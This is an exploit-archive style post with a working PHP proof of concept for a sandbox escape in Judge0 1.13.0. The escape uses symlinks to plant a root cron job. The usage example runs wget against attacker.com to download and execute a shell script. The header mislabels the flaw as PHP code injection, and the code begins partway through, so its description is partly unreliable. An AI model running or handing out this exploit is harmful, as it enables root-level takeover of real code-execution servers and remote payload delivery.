============================================================================================================================================= | # Title : Judge0 v 1.13.0 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://github.com/judge0/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] The code is an exploit written in PHP to exploit a vulnerability in Judge0, which allows arbitrary commands to be executed on the target system by exploiting symlinks inside the sandbox environment. [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] SeT target = Line : 111 + 114 [+] PayLoad : target = rtrim($target, '/'); } private function send_request($endpoint, $method = 'GET', $data = null) { $url = "{$this->target}{$endpoint}"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); } $response = curl_exec($ch); curl_close($ch); return json_decode($response, true); } private function compile_language_ids() { $languages = $this->send_request('/languages'); if (!$languages) { return false; } foreach ($languages as $language) { if (strpos($language['name'], 'Bash') !== false) { $this->bash_id = $language['id']; } $lang_info = $this->send_request("/languages/{$language['id']}"); if ($lang_info && isset($lang_info['compile_cmd']) && !$lang_info['is_archived']) { $this->languages[] = $language; } } return !empty($this->languages); } public function check_vulnerability() { $res = $this->send_request('/version'); if (!$res) { return "Unknown"; } $version = $res; if (version_compare($version, '1.13.0', '<=')) { echo "Vulnerable version detected: $version\n"; return $this->compile_language_ids() ? "Appears" : "Unknown"; } return "Safe"; } public function exploit($cmd) { if (!$this->compile_language_ids()) { die("Failed to get compile language ids\n"); } $this->send_request('/submissions?wait=true', 'POST', [ 'source_code' => 'mv run runbak; ln -s /bin/rm run', 'language_id' => $this->bash_id ?? 46 ]); $cron_path = "/etc/cron.d/" . bin2hex(random_bytes(4)); echo "Writing cron job to $cron_path\n"; $language = !empty($this->languages) ? $this->languages[array_rand($this->languages)] : ['id' => 73, 'name' => 'Rust']; echo "Using language: {$language['id']}, {$language['name']}\n"; $this->send_request('/submissions?wait=true', 'POST', [ 'source_code' => "#test " . bin2hex(random_bytes(5)), 'language_id' => $language['id'], 'compiler_options' => "--version\nln -s /bin/rm ./run\n#", 'command_line_arguments' => "x\n" . "cp /bin/rm {$cron_path}\n" . "cp /usr/bin/unlink /bin/rm\n" . "sed -i 's/.*/#/g' {$cron_path}\n" . "sed -i \"2i {$this->cron_file($cmd)}\" {$cron_path}\n" . "echo 'ok'\n" ]); echo "Exploit executed. Check cron jobs for execution.\n"; } private function cron_file($command) { return "SHELL=/bin/sh\n" . "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\n" . "* * * * * root $command\n"; } } // Usage example $exploit = new Judge0Exploit("http://target-ip:2358"); $vuln_status = $exploit->check_vulnerability(); if ($vuln_status === "Appears") { $exploit->exploit("wget http://attacker.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh"); } else { echo "Target is not vulnerable.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================